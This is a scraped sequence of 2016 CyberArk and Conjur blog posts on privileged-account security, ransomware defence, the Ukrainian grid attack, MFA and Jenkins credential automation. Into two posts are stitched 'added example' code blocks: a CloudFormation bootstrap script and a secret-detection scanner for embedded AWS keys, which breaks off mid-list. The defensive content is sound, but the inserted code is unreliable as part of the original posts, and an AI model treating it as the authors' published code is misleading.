Cyber Security as a Feature

Forward-looking service providers need to start thinking about security from a community perspective. Ideally, they will integrate a strong cyber security posture as a feature that is highlighted within their value proposition.

Cyber security is not traditionally at the core of vendor management and third-party offerings. However, there will be a tipping point where it’s expected that third-party organizations are more security focused. Ultimately they will prioritize security and highlight it as a key part of their service.

From the vendor’s perspective what does it mean to place value on cyber security? Vendors should, for example, start to focus on internal capabilities including Multi-Factor Authentication (MFA), data encryption, insider threat detection, and a cyber education and awareness platform to help thwart phishing and data breaches.

One way for vendors to integrate cyber security as a core competency is to partner with a security firm to improve their offering. Additionally, they can continue to educate their staff on the nuances of cyber security including common vulnerabilities and methods for defending data and networks.

Conclusion

Remote vendors and outsourced service providers are core to most businesses. From CRM systems and payment solutions to hardware and operational technology, vendors have direct or indirect access to, or an impact on, the systems that run businesses.

In order to mitigate the risks vendors introduce, these companies need to take the lead by offering cyber security programs at the core of their key features. In the meantime, organizations can also mitigate the risk by closely managing and securing vendor credentials, isolating and monitoring vendor sessions, and continuing to watch for and alert on suspicious activity.
Conjur Delivers Automated Access Management to Windows Platforms https://www.cyberark.com/blog/conjur-delivers-automated-access-management-to-windows-platforms/ Tue, 05 Apr 2016 12:06:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-delivers-automated-access-management-to-windows-platforms/  

Press Release:

Native .NET Libraries and Windows Remote Desktop Support Spans Microsoft Workloads in Cloud, Hybrid and PaaS Environments

WALTHAM, Mass.– April 5, 2016 – Conjur, Inc., provider of automated access management software, has released significant product enhancements for Microsoft® Windows® environments that address the growing customer requirements for building, managing and securing Windows workloads in cloud and hybrid cloud environments. Conjur’s Windows capabilities deliver a consolidated approach for access, control, authorization and audit for Windows resources and development environments.

Now, customers can seamlessly extend their on-premises datacenter operations to cloud services, leverage Microsoft Azure services and accelerate the .NET software development lifecycle while strengthening security practices.

Conjur’s new support for native Windows authentication and real-time application of authorization and permissions to dynamic virtual machines ensures a graceful IT migration.

“As we broaden our market adoption, the need for first class Microsoft Windows support is apparent, especially in hybrid and heterogeneous environments,” said Mitch Haile, Vice President of Products at Conjur. “We are excited to support both .NET native client APIs and Windows Remote Desktop Access Management for modern, highly automated IT environments.”

Conjur’s Windows release incorporates support for:

  • Windows Remote Desktop Connector: Integrate Windows authentication for user login to Windows instances operating in cloud environments.
  • Native .NET Client Library: Conjur’s new .NET client library is open source and available immediately.

“Conjur’s new native .NET libraries and Remote Desktop access to Microsoft Windows hosts in the cloud are a significant step forward in enabling automated infrastructure security,” says Dave Bechberger, Senior Architect at Expero Inc.

Through a centralized authorization service exposed through APIs, Conjur enables enterprises to apply a consistent set of policies for production, staging and test environment access throughout the entire software development cycle. These latest enhancements meet the requirements for the scalable, enterprise-grade secret management solution for organizations in highly regulated industries.

About Conjur

Conjur is preventive security for companies that are automating their IT systems, who need to control access, and need to demonstrate control. For enterprises that need to protect their infrastructure, Conjur is the only solution with comprehensive identity and authorization for every cloud, VM, container, service, job and user. Conjur helps companies such as Netflix, Box, and Puppet Labs solve critical operational, compliance, and security challenges that originate in modern automated infrastructure. Headquartered in Waltham, Massachusetts, Conjur is funded by Avalon Partners and Amplify Partners. Visit www.conjur.net and follow @conjurinc on Twitter.

PR Contact:
Tracy Wemett
BroadPR
+1-617-868-5031
All trademarks recognized.

Minimize Ransomware Threats While Achieving Security and Productivity with Least Privilege and Application Control https://www.cyberark.com/blog/minimize-ransomware-threats-while-achieving-security-and-productivity-with-least-privilege-and-application-control/ Thu, 31 Mar 2016 16:48:33 +0000 https://www.cyberark.com/blog//

It’s hard to open a newspaper or scroll through daily headlines without seeing new reports of extortion and blackmail through the use of ransomware – a type of malicious software designed to prevent access to information on a computer system until a sum of money is paid. Once used largely by cyber criminals to target consumers for short change, ransomware attacks have escalated to the enterprise, with highly motivated adversaries targeting corporate networks with increasingly creative tactics. Recently, major news outlets including the BBC and New York Times were also hit by ransomware “malvertising” that demanded payment in Bitcoin to unlock user computers. According to The Guardian, the malware “was delivered through multiple ad networks and used a number of vulnerabilities, including a recently-patched flaw in Microsoft’s former Flash competitor Silverlight, which was discontinued in 2013.”

There are two types of ransomware attacks that organizations could experience. The first is “standard” ransomware infecting user machines, the same ransomware that would infect a regular consumer at home. These attacks are opportunistic and less damaging to organizations, which usually store important information on dedicated servers and in databases out of the attacker’s reach, so files on user machines can be replaced fairly easily.

The second type is far more dangerous. These ransomware attacks follow the same general attack pattern as targeted network attacks, but for a much different end goal. Instead of information theft, ransomware attackers seek to cause widespread havoc through mass infection and encryption of user data. To do this, attackers often seek out privileged accounts to hijack (both privileged user accounts and application accounts used by automated processes, services and applications), then exploit them to propagate the ransomware throughout the network.

An example of this is a recent attack that targeted three Indian banks and a pharmaceutical company, resulting in millions of dollars in damage. The attacker infiltrated each company’s network, hijacked the necessary privileged credentials, then escalated access to other computers via unprotected Remote Desktop Protocol (RDP) ports. With access to a computer gained, the attacker downloaded the ransomware from a server and started the encryption process. Without privileged access, the attacker’s mission could not have been accomplished.

Removing local privileges can help defend against ransomware attacks, but it is not necessarily enough. CryptoLocker, for example, encrypts data using standard user rights, so removing or restricting local administrative rights without additional security measures does not completely mitigate the risk. And because CryptoLocker encrypts (and renders unreadable) every file the user has access to in a corporate environment, its effect is devastating.

With increasing attention on ransomware, many organizations are focused on eliminating the threat of a ransomware infection. To effectively defend against such attacks, organizations must combine the principle of least privilege AND application control to reduce the attack surface and block their progression. This dual-pronged approach can prevent ransomware from entering an organization in four key ways:

  • It blocks untrusted applications
  • It restricts or denies access for unknown applications (such as CryptoLocker)
  • It continuously monitors applications entering the environment
  • It removes local admin privileges, blocking CryptoLocker from running the shadow copy deletion command, so security teams can restore encrypted files from shadow copies

Organizations should look for flexible tools that automate the management of local administrator privileges and control of applications on endpoints and servers. This unique combination of least privilege and application control can help organizations reduce the attack surface, protect against threats that have made their way inside, and alert security teams to potential in-process attacks – all without halting user productivity or overwhelming IT security teams.

To learn more about minimizing ransomware threats while achieving security and productivity with least privilege and application control, download this free eBook.

The 5 Stages of Secrets Management Grief, And How to Prevail [Slideshare] https://www.cyberark.com/blog/the-5-stages-of-secrets-management-grief-and-how-to-prevail-slideshare/ Thu, 31 Mar 2016 14:45:00 +0000 https://cyberarkvx2.wpengine.com/blog/the-5-stages-of-secrets-management-grief-and-how-to-prevail-slideshare/  

Our VP, Josh Bregman, was lucky enough to attend and speak at Puppet Camps Dallas. You might be wondering, what exactly are Puppet Camps? Puppet Camps are one-day events where you can watch presentations delivered by prominent members of the community as well as connect with fellow Puppet users. We recently spoke with Grace Stillar, Events Marketing Coordinator at Puppet Labs. To learn more about Puppet Camps, check out our conversation with her.

Along with meeting with fantastic people, and handing out some swag, Josh spoke about The 5 Stages of Secrets Management Grief. He outlined the feelings of denial, anger, bargaining, depression, and acceptance and informed listeners how to power through them. Attendees learned how to maintain Puppet workflows while keeping secrets secure and risks at a minimum.

Josh’s presentation discusses best practices around:

  • Why moving to DevOps is good for security as well as the cultural and organizational challenges associated with the transition.
  • How your Puppet architecture affects your ability to protect access to sensitive information (secrets) like database passwords, API keys, and certificates.
  • How to integrate Conjur with Puppet to ensure secure, scalable, and audited access to secrets.

Federal Agencies Sprint Towards Multi-Factor Authentication, but There Are Gaps to Address https://www.cyberark.com/blog/federal-agencies-sprint-towards-multi-factor-authentication-but-there-are-gaps-to-address/ Tue, 29 Mar 2016 12:32:13 +0000 https://www.cyberark.com/blog//

The need for stricter cyber security measures within federal, state and local governments is well documented from high-profile breaches including those within the U.S. Office of Personnel Management (OPM) and the Internal Revenue Service.

As part of a directive to better protect the integrity of federal networks, in June 2015 the U.S. Chief Information Officer Tony Scott launched a 30-day Cybersecurity Sprint requiring federal agencies to improve the security and resilience of their networks by tightening policies and practices for privileged users and credentials across networks. The focus on privileged account security signaled a shift in security strategy for both public and private organizations – one that assumes attackers are already inside the enterprise.

Multi-factor authentication was among the requirements included in the Sprint. Specifically, the initiative required agencies to: “Dramatically accelerate implementation of multi-factor authentication, especially for privileged users. Intruders can easily steal or guess usernames/passwords and use them to gain access to Federal networks, systems, and data. Requiring the utilization of a Personal Identity Verification (PIV) card or alternative form of multi-factor authentication can significantly reduce the risk of adversaries penetrating Federal networks and systems.”

The implementation of multi-factor authentication solutions is a response to vulnerabilities associated with privileged account credentials. Privileged account credentials are used by cyber attackers in nearly 100% of attacks to reach their goals of successfully breaching networks. Privileged accounts and credentials include IT administrative credentials, default and hard-coded passwords, application backdoors and SSH keys.

To mitigate risks, proactive security controls are a must, and credentials have to be managed and appropriately protected with solutions like multi-factor authentication, but adoption is not an easy feat for government agencies.

Addressing the Challenges

Multi-factor authentication implementations come with several challenges and complexities. Fortunately, there are alternatives to consider. For example, in a recent FCW article, Deborah Golden, principal and Federal Cyber Risk Services leader at Deloitte & Touche, notes that federal agencies can consider a multi-tiered approach by:

  • Requiring PIV authentication where possible and rapidly implementing known technical solutions for environments that can support PIV.
  • Using other multi-factor authentication tokens, where available, to eliminate remaining password-enabled accounts.
  • Determining mid- and long-term infrastructure changes required to PIV-enable all privileged user accounts.

The use of PIV cards for multi-factor authentication has known limitations with its ability to secure accounts that do not natively support PIV cards. CyberArk, however, helps organizations to meet the mandated use of multi-factor authentication for all privileged accounts by enabling PIV card authentication to all systems and applications managed by the CyberArk Privileged Account Security Solution – even applications that can’t natively support public key infrastructure (PKI) or multi-factor authentication. This approach enables the organizations to work with their existing infrastructure and centrally add PIV card authentication.

To simplify deployment of the solution while maintaining individual accountability, many organizations working with CyberArk use shared accounts managed by the solution instead of personal privileged accounts. Each user is given PIV card-protected access to the shared accounts stored in the secure digital vault; the identity is thus decoupled from the account, and organizations can more easily manage user access while maintaining the required visibility. The combination of shared accounts centrally stored in the CyberArk Privileged Account Security Solution, access protected with PIV cards, and individual accountability helps organizations meet the mandate for multi-factor authentication without introducing undue burden. CyberArk supports a variety of multi-factor authentication technologies, including PIV and CAC cards.

Beyond its consulting efforts, CyberArk offers additional solutions that help bolster cyber security strategies within federal, state and local governments. For example, CyberArk SSH Key Manager securely stores, rotates and controls access to SSH keys to prevent unauthorized access to privileged accounts. Additionally, CyberArk Privileged Session Manager secures, controls and monitors privileged user access and activity on critical UNIX, Linux and Windows-based systems, databases and virtual machines.

For more information on security and compliance for federal agencies, visit CyberArk’s Federal solutions webpage.

Failure to Secure Privileged Accounts Means “Lights Out” https://www.cyberark.com/blog/failure-to-secure-privileged-accounts-means-lights-out/ Fri, 25 Mar 2016 17:55:24 +0000 https://www.cyberark.com/blog//

As more details about the attack on the Ukrainian power grid are published, it becomes clearer that this was one of the more sophisticated cyber-attacks in recent years and the first critical infrastructure attack to actually cause physical ramifications (a blackout for approximately 230,000 people).

The Ukrainian electric grid operators used strong cyber defenses in their power management networks, including firewalls and system logging controls. But as in many other attacks, the attackers were able to penetrate the network and cause serious damage by taking control of privileged account credentials.

A newly published post-mortem analysis from SANS, in conjunction with the North American Reliability Corporation (NERC)’s E-ISAC, confirms that the attack started as a spear-phishing attack that penetrated the corporate network and enabled the attackers to harvest user credentials. The stolen credentials included credentials for accessing the VPN service that grants remote access into its ICS/SCADA network.

The use of stolen credentials to remotely access critical ICS assets is the most common threat to power grids. This is exactly what the attackers were able to do. After using the VPN credentials, the attackers were able to access other critical systems and went as far as logging out the operators in the control center, effectively taking control of the company’s power substations.

The sophistication of the attack is evident from the multiple systems that were targeted and penetrated in the Ukrainian power grid. This takes a well-coordinated plan, as well as a thorough understanding of the network architecture. With the stolen privileged credentials, the attackers gained this understanding by conducting reconnaissance on the network undetected for more than 6 months. They used this time to learn how to disable critical ICS operator workstations, preventing operators from intervening and initiating contingency procedures.

Some of the steps taken in this attack include:

  • Disabling primary and back-up power (UPS) to the control system, causing the control center to lose power.
  • Rewriting the firmware on the serial-to-Ethernet converters in the substations, preventing the control center from accessing them remotely.
  • Launching a telephone denial-of-service attack against the customer call centers, preventing them from receiving real reports on the blackout.
  • Using malware named KillDisk to wipe files from the control center computers, causing them to crash and leaving the control center unable to start up and quickly recover from the attack.

This Dark Reading article delves into the new SANS analysis on how the attackers successfully took control of the industrial control systems across three regional power firms and successfully shut off the lights, and also explores some key lessons learned from the attack. It’s worth a read. And for additional reading and resources on mitigating cyber security risk and protecting the grid, I encourage you to check out the following blog posts:

Conjur to Speak at Puppet Camps Dallas https://www.cyberark.com/blog/conjur-to-speak-at-puppet-camps-dallas/ Wed, 16 Mar 2016 20:31:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-to-speak-at-puppet-camps-dallas/  

Heading to Dallas next week (3/22) for Puppet Camps? What a coincidence, so are we! Not only are we sponsoring Puppet Camps, but our VP, Josh Bregman, will be giving a talk on “The 5 Stages of Secrets Management Grief [And How To Prevail]”.

During his 30-minute session, Josh will discuss the progression of the 5 typical emotions you feel when coming to terms with the sensitive data in your configuration management system. He will discuss the tools that let you maintain your Puppet workflows while keeping your secrets management risks minimal.

Interested in Puppet Camps but not sure what to expect? We’ve got you covered with a sneak peek at all you can look to gain from these one day events.

If you are planning to attend in Dallas, don’t forget to check out Josh’s talk, or ping him beforehand to meet up; he would love to talk to you! You can tweet him or send him an email at josh.bregman@cyberark.com.

Four Characteristics that make Brokerage Organizations Prime Cyber Security Targets https://www.cyberark.com/blog/four-characteristics-make-brokerage-organizations-prime-cyber-security-targets/ Mon, 14 Mar 2016 18:33:02 +0000 https://www.cyberark.com/blog//

If you talked to a brokerage leader 10 years ago, the conversation around cyber security usually focused on achieving compliance. Today, in order to mitigate the risk of attacks, compliance is the beginning, not the end.

It’s imperative to go well beyond compliance, and this is particularly true for online brokerage organizations. Regardless of size, these organizations are natural targets for cyber attackers. Online brokers focus on customer service, and this often extends to keeping usability, accuracy and speed at the core of their transactions. These elements are not only central to the business but also to their product.

Mixing this type of business model with an environment that is always-on and always moving sensitive, high-risk data around multiple systems, creates a high-value target for a cyber attacker.

The brokerage industry relies heavily on developers and technology analysts to streamline the customer experience, making sure that their brokerage products scale and provide the most accurate information. As a result, the industry has a larger than average IT support and development staff when compared to similar sized companies within other industries.

The operating environment that brokerage organizations typically embody creates the following cyber risks:

  1. Large IT Staff: The larger than average IT staff often results in larger than average access to high-risk, backend systems, applications and data. This access is available to a large array of teams and people, including developers and vendors. In order to do their job, this operational staff needs as much access as possible to make changes, patch, reboot a server, restart a service, install software and more. This accessibility often leads to a greater chance of compromising high-risk data or stopping a critical service.
  2. Privileged Access Abundance: Because of the large IT teams and other users that require credentials to complete financial transactions, the modern attacker knows these online brokerage institutions have an abundance of privileged accounts. Once attackers find a way inside the network, they may continue to move laterally, escalate privileges and cause damage before they are even detected.
  3. Wealth of Data: Brokerage applications and systems hold very valuable information, from personal information, to financial trends, to account balances. Access into these systems equates to access into bank accounts, wire transfers and various other monetary transactions.
  4. Too Much to Track: Online brokerage accounts are based on hundreds if not thousands of automated transactions. These transactions occur at high speed and between various systems. The whole business relies on these transactions occurring at the right time with the right information. This makes it easy for an intruder to cripple the entire system with a minor tweak.

Controlling, monitoring and auditing privileged access is vital to mitigating the risks within brokerage organizations. Brokerage organizations can implement a stringent cyber security platform while continuing to provide customers with a scalable product.

By adding proactive security controls along with detection on what really matters, brokerage organizations can mitigate the risks that stem from their business model and the operating environment that is always-on and always moving sensitive, high-risk data around multiple systems.

To learn more about best practices for protecting privileged accounts, download and read “The Three Phases of Securing Privileged Accounts: A Best Practices Guide.”

Observations from the 2016 RSA Conference https://www.cyberark.com/blog/observations-2016-rsa-conference/ Fri, 11 Mar 2016 20:56:18 +0000 https://www.cyberark.com/blog//

Now that we’ve had a few days to catch our breath, it’s time to reflect upon some of the highlights from the RSA Conference in San Francisco last week. This was the 25th annual conference, and it was attended by more than 40,000 security professionals from more than 700 companies worldwide.

Hot Topics for Conversation

This year, the encryption debate – notably the government’s heated battle with Apple – dominated keynotes, sessions and one-on-one conversations. Today, organizations struggle to find the right balance between security and privacy, and although the rise in breaches and increase in cloud adoption are natural drivers for encryption, hurdles remain for many companies, found a new Ponemon Institute study released during the show.

Analytics was another hot topic. From walking around the show floor, listening to sessions and reading news, there is a clear evolution from discussions about being able to simply detect a security threat – to using behavioral and network analytics to enable organizations to respond.

Other notable topics included the Internet of Things, industrial control systems, artificial intelligence and machine learning. Once again, discussion about privilege was everywhere at RSA – and not just at our booth. Dialogue amongst security researchers, practitioners and vendors alike centered on a common attack link: privileged account exploits. We had a record number of attendees visit the CyberArk booth, seeking ways to mitigate risk and proactively protect against stolen privileged credentials, Kerberos attacks, malicious insiders, Golden Ticket attacks and Pass-the-Hash attacks.

Privileged Threat Analytics

To kick off the show, we unveiled new real-time threat detection and containment capabilities, available via CyberArk Privileged Threat Analytics 3.0, to help organizations secure against cyber attacks that target the Microsoft Active Directory infrastructure. You can find full details and free resources here and check out a 2-minute video here.

Our team talked with our customers and prospects, many of whom were CISOs of their organizations and were often joined by their CIOs – underscoring a larger trend we’re seeing of cyber security becoming a C-level business priority. Attendees lined up to participate in a demo of CyberArk Privileged Threat Analytics, and those who participated were entered into a drawing to win $10K to their favorite charity, which we’ll announce soon. Stay tuned!

Speaking Highlights

In addition to countless conversations and demos at our booth, two of our colleagues had speaking sessions that emphasized proactive protection and threat detection. In the interactive BSides San Francisco talk titled, Scan, Pwn, Next – Exploiting Service Accounts in Windows Networks, CyberArk Labs’ Andrey Dulkin, senior director of cyber innovation, and Matan Hart, security researcher, outlined the ways attackers exploit service accounts in Windows. They also presented research highlighting the exposure of service accounts in real-world networks.

Gerrit Lansing, CISSP, director of consulting services, presented on “Protecting Your King: The Key to Maintaining Control of Your Business” at RSA. Gerrit explored the increasingly common types of Kerberos attacks, including Golden Ticket, and he discussed how privileged account security solutions that combine proactive protection and threat detection can thwart attackers before network takeover is accomplished and trust in the IT infrastructure is broken.

Partner Connections

RSA always presents an exciting opportunity to meet with our technology and channel partners from around the globe and share insights on how to collaboratively help the larger community and our customers address their most pressing security issues – and this year was no exception.

We are pleased to play a role in several new initiatives launched by our partners, including Tenable Network Security, which unveiled its new Technology Integration Partner Program. We are an inaugural member of the program, which was built to encourage collaborative, innovative solutions to help customers protect against evolving threats.

Additionally, our work with Splunk on the Adaptive Response Initiative was highlighted at the show. As our Executive Vice President Adam Bosnian stated, “A coordinated best-of-breed defense is an important step in effectively combatting the numerous and potentially devastating attacks that companies experience every day.”

Last, but not least, RSA announced new identity assurance and identity governance capabilities in RSA® Via. The interoperability of the CyberArk Privileged Account Security Solution’s proactive protection and detection capabilities with RSA Via Lifecycle and Governance helps to reduce the attack surface by managing privileged user provisioning, entitlements and access certification in a centralized, holistic approach.

Another great show in the books! Thanks to our customers, partners, colleagues and peers for another fantastic RSA Conference. See you next year!

Scaling Jenkins with Machine Identity https://www.cyberark.com/blog/scaling-jenkins-with-machine-identity/ Wed, 09 Mar 2016 14:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/scaling-jenkins-with-machine-identity/  

Today I’d like to share how we scale our build infrastructure at Conjur. We build and test the software we release on a Jenkins cluster running in AWS. Right now, we have nearly 100 different jobs defined and several different pipelines. We’ve been able to cut down on job maintenance by defining jobs in the Jenkins Job DSL (all our job definitions are open source here). But wasted time adds up if you can’t find a way to automatically launch and configure executor nodes as needed. In this post I’ll describe in detail how we scale Jenkins executors safely and securely.

Goals

Before diving into technical details I want to briefly cover our goals, the reasons why we spent time automating our build infrastructure.

  1. Demand is variable. When putting the finishing touches on a new release, we run more jobs than usual. Pipelines are run more often and at the same time. We need to be able to scale executor capacity up and down easily.
  2. No human in the loop. Launching and configuring nodes by hand distracts engineers from the creative work that only people can do. The only decision someone should have to make is how much capacity they need.
  3. Nodes should automatically bootstrap with a machine identity. Different jobs need different credentials to build and deploy artifacts. Executor nodes need to receive an identity that lets them fetch these credentials.

By automating our build infrastructure, engineers can focus on valuable projects and initiatives. This means less time from idea to implementation of new features. It also keeps the team happier and more engaged. Configuring servers by hand is not exciting work.


1. Define infrastructure as code

Since our infrastructure is in AWS, we use CloudFormation to describe it declaratively. Unfortunately, CloudFormation’s template language is JSON. JSON is great for machines, but not so great to write and edit by hand. To avoid some frustration, we use the CloudFormation Ruby DSL gem to write templates in Ruby. Running the Ruby file generates the JSON for you. We’ve found this to be a more flexible and less error-prone way to define templates.


For Jenkins executors, we define an autoscaling group with the desired capacity as a parameter. Our engineers have access to change this parameter as they need. There are several parameters for this template, including the Host Factory token. We’ll cover that in Step 3. The full template for our Jenkins executors is available on GitHub.

2. Allow executor nodes to register themselves

When Jenkins executor instances first start, they should register themselves with the Jenkins master. Adding and removing nodes manually in the Jenkins UI is a distraction from real work. Registering as an executor via JNLP is not an automatic process. You need a node name to register, which means that the node must already exist in Jenkins. That means you have to create one via the Jenkins UI or API before your newly-launched executor can join your Jenkins node pool. Bummer.

Thankfully, the Jenkins Swarm plugin exists. Using this plugin you can register executor nodes with the Jenkins master without manual intervention. Once the plugin is installed, you can use the swarm CLI to connect to your Jenkins master when an executor starts up. The CLI should be started as the ‘jenkins’ user; otherwise you’ll have issues with permissions in your builds. We created a single-purpose user for authenticating swarm nodes.

Bootstrapping into a swarm looks like this in a userdata.sh script, a script that runs as root when the machine boots up:

One neat thing about CloudFormation parameters is that you can reference them in userdata.sh. You can see this above with ref('NodeName'). We set the default for that parameter to ‘executor’. The Swarm CLI appends nodes with a random string so the resulting executor name you’ll see in Jenkins is something like ‘executor-3d5fe07e’. You can see in the script above that we use the Conjur CLI to fetch the Swarm password. I’ll explain how this works in the next section.

3. Apply machine identity on launch

Our Jenkins executors need access to fetch credentials to run jobs. They also need access to credentials during their bootstrap process. We dogfood here, using Conjur’s Host Factory to apply a unique machine identity and add the node to a build layer. The build layer is granted access to a set of credentials with Conjur policy, declared in YAML.

We created a Host Factory token that allows nodes to bootstrap themselves into the build layer. This token is passed as a CloudFormation parameter and used in ‘userdata.sh’ to run Chef cookbooks that apply machine identity and set up SSH access. There are several ways to bootstrap identity; passing CloudFormation parameters is the best fit for us at the moment.

This step happens before running swarm in step 2. The build layer has fetch access to the credential ‘jenkins/swarm/password’. Once the node is a member of that layer it can fetch the password. Access to this credential is also recorded to an immutable audit log. Here’s an example log from the Conjur UI:

Log Example from the Conjur UI
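The three steps above, as an added example that is not Conjur's own template or userdata script: a plain-Ruby/JSON build of the executor stack (the post uses the CloudFormation Ruby DSL gem, which this does not require), with local resolution of the parameter references so you can inspect the script a node would actually run, and a pre-deploy check that the Host Factory token parameter is NoEcho. Resource logical names, the AMI, the host-id prefix, the jq dependency and the Conjur v4 CLI subcommands are assumptions, not values from the post.

```ruby
# Added example, not Conjur's own template: the same shape as the post's CloudFormation
# stack (DesiredCapacity, NodeName and HostFactoryToken parameters, userdata that references
# them) built with plain Ruby and the json stdlib instead of the CloudFormation Ruby DSL gem.
require 'json'

# Tiny stand-ins for the intrinsic-function helpers the DSL gem provides.
def ref(name)
  { 'Ref' => name }
end

def join(*parts)
  { 'Fn::Join' => ['', parts] }
end

# The bootstrap script as Fn::Join parts, so CloudFormation substitutes the parameters.
# Conjur v4 CLI subcommands, the jq dependency and the host-id prefix are assumptions.
def userdata_parts
  [
    '#!/bin/bash -e', "\n",
    'INSTANCE_ID=$(curl -s http://169.254.169.254/latest/meta-data/instance-id)', "\n",
    'HOST_ID="jenkins/executors/', ref('NodeName'), '-${INSTANCE_ID}"', "\n",
    '# 1. Exchange the Host Factory token for a host identity in the build layer.', "\n",
    'API_KEY=$(conjur hostfactory hosts create "', ref('HostFactoryToken'),
    '" "$HOST_ID" | jq -r .api_key)', "\n",
    'conjur authn login -u "host/$HOST_ID" -p "$API_KEY"', "\n",
    '# 2. Only as a layer member can the node read the swarm password (audited by Conjur).', "\n",
    'SWARM_PASSWORD=$(conjur variable value jenkins/swarm/password)', "\n",
    '# 3. Register with the master as the jenkins user, never as root.', "\n",
    'exec sudo -u jenkins java -jar /opt/jenkins/swarm-client.jar -master ', ref('JenkinsMasterUrl'),
    ' -username swarm -password "$SWARM_PASSWORD" -name ', ref('NodeName'),
    ' -fsroot /var/lib/jenkins', "\n"
  ]
end

# Resource logical names, AMI id and instance type are constructed placeholders.
def jenkins_executor_template
  {
    'AWSTemplateFormatVersion' => '2010-09-09',
    'Description' => 'Jenkins executor pool (added example)',
    'Parameters' => {
      'DesiredCapacity' => { 'Type' => 'Number', 'Default' => 2 },
      'NodeName' => { 'Type' => 'String', 'Default' => 'executor' },
      'HostFactoryToken' => { 'Type' => 'String', 'NoEcho' => true },
      'JenkinsMasterUrl' => { 'Type' => 'String' }
    },
    'Resources' => {
      'ExecutorLaunchConfig' => {
        'Type' => 'AWS::AutoScaling::LaunchConfiguration',
        'Properties' => {
          'ImageId' => 'ami-PLACEHOLDER', 'InstanceType' => 'm4.large',
          'UserData' => { 'Fn::Base64' => join(*userdata_parts) }
        }
      },
      'ExecutorGroup' => {
        'Type' => 'AWS::AutoScaling::AutoScalingGroup',
        'Properties' => {
          'LaunchConfigurationName' => ref('ExecutorLaunchConfig'),
          'AvailabilityZones' => { 'Fn::GetAZs' => '' },
          'MinSize' => '0', 'MaxSize' => '20',
          'DesiredCapacity' => ref('DesiredCapacity')
        }
      }
    }
  }
end

# Resolve Ref / Fn::Join / Fn::Base64 locally (Base64 left decoded) to inspect the script.
def resolve(node, params)
  case node
  when Hash
    return params.fetch(node['Ref']) if node.key?('Ref')
    return node['Fn::Join'][1].map { |p| resolve(p, params) }.join(node['Fn::Join'][0]) if node.key?('Fn::Join')
    return resolve(node['Fn::Base64'], params) if node.key?('Fn::Base64')
    node.transform_values { |v| resolve(v, params) }
  when Array then node.map { |v| resolve(v, params) }
  else node
  end
end

def collect_refs(node, acc = [])
  case node
  when Hash
    acc << node['Ref'] if node.key?('Ref')
    node.each_value { |v| collect_refs(v, acc) }
  when Array then node.each { |v| collect_refs(v, acc) }
  end
  acc
end

# Pre-deploy checks: every Ref is declared, and any parameter that looks like a secret is
# NoEcho so the Host Factory token never shows in the console or describe-stacks output.
def validate_template(template)
  declared = template['Parameters'].keys + template['Resources'].keys
  undeclared = collect_refs(template).uniq.reject { |n| declared.include?(n) || n.start_with?('AWS::') }
  problems = undeclared.map { |n| "undeclared Ref #{n}" }
  template['Parameters'].each do |name, spec|
    problems << "secret-looking parameter #{name} lacks NoEcho" if name =~ /token|password|secret/i && spec['NoEcho'] != true
  end
  problems
end
```

Call `JSON.pretty_generate(jenkins_executor_template)` to emit the template the same way the post runs the Ruby file to produce JSON.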


Our full templates and userdata script for Jenkins can be found on GitHub. By implementing the steps above, our Jenkins executor pool can be scaled up and down by changing the Desired Capacity parameter defined in our CloudFormation template. Adding nodes via Jenkins Swarm just works. When nodes are terminated, they are removed from the Jenkins UI as well. Managing access to credentials can be done at any time without needing to destroy or recreate infrastructure. Our engineers can spend more time working on all of the projects that comprise Conjur and less time managing build infrastructure.

Security Risks and Automated Solutions https://www.cyberark.com/blog/security-risks-and-automated-solutions/ Tue, 08 Mar 2016 18:06:00 +0000 https://cyberarkvx2.wpengine.com/blog/security-risks-and-automated-solutions/  

The Cloud Security Alliance recently released the Treacherous 12, the top cloud computing threats of 2016. Their goal in creating this piece is to help enterprises mitigate risk and come up with security solutions that defend against the most pressing security issues of the coming months. Although security experts warn against these risks, few companies take concrete steps to avoid them, and security breaches occur as a result. Therefore, it is not only important to craft a security plan, but also to follow it, keeping the issues of automation, access management, and secrets rotation in mind.

CSA Releases Top Cloud Computing Threats of 2016

A key theme throughout the entire article is the need for automation. It stresses the importance of proper identity, credential, and access management. These are practices that all organizations must be particularly mindful of, as data breaches can arise from a lack of scalable access management and a lack of key and secret rotation.

As your enterprise grows, new people will be entering and exiting your infrastructure. As this happens, people will gain and lose access to key secrets. It is imperative that you have systems in place to make provisioning and deprovisioning access to secrets easy and scalable. Data breaches often occur when security solutions are not built to scale. The solution you use when you have only ten employees is often very different from the solution you will need when you hit ten thousand. It is relatively easy to know who has access to what when you only have a handful of users, but the difficulty of this task increases dramatically as teams and infrastructures expand.

An automated security solution that scales is imperative to your security strategy. This way, you don’t need to worry about altering solutions as your company grows, and you can concentrate on innovation and expansion rather than administrative security tasks. It is crucial to have a definitive understanding of who has access to what, and when, or you risk the security of your entire organization. As users enter and exit your infrastructure, former employees must no longer have access to sensitive data, and current employees should only have access to the secrets they need. Automated credential management is necessary to ensure that malicious actors don’t gain unauthorized access to secrets that can damage the organization.

Rotating secrets is crucial to avoiding a cybersecurity breach. Be sure to set policies that dictate when secrets must be rotated, and passwords changed, so that this sensitive data is not vulnerable. Having automated secrets rotation guarantees that employees aren’t bogged down with constantly monitoring these changes, and there are no internal slip-ups when it comes to making sure secrets remain secure.

The piece also cautions enterprises that are looking at new cloud providers and solutions to have a complete understanding of their security protocols, and their daily processes, to make sure these procedures fit with your security goals and regulations. Although additional tools are often necessary, it is crucial to understand the way they work and the systems they use, safeguarding your infrastructure from new vulnerabilities. 

The article states, “Credentials and cryptographic keys must not be embedded in source code or distributed in public facing repositories such as GitHub, because there is a significant chance of discovery and misuse.” It then gives an example in which cloud service provider credentials were found in a GitHub project; those credentials were taken and misused within a few days. Although there are plenty of examples of security risks arising from the mishandling of secrets, these mistakes are still made, and real data breaches occur because of them.
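One practical control for the “credentials embedded in source code” risk the CSA report calls out is a scan of staged files before they reach a repository. The following is an added example, not code from the CSA report or this post; its detection rules and the sample files are constructed for illustration, and the masked-value reporting is so that the scan output itself does not leak whatever it finds.

```python
"""Pre-commit style scan for credentials embedded in source and config files.

Added example (not from the CSA report or this post). The rules and the sample
files are constructed for illustration; tune the patterns for your own code base.
"""
import re
from typing import Dict, List, NamedTuple


class Finding(NamedTuple):
    path: str
    line_no: int
    rule: str
    masked: str  # only a prefix of the value, so the report itself does not leak it


# Each rule is (name, pattern). Group 1, when present, is the secret value.
RULES = [
    # AWS access key IDs: fixed prefix followed by exactly 16 uppercase alphanumerics.
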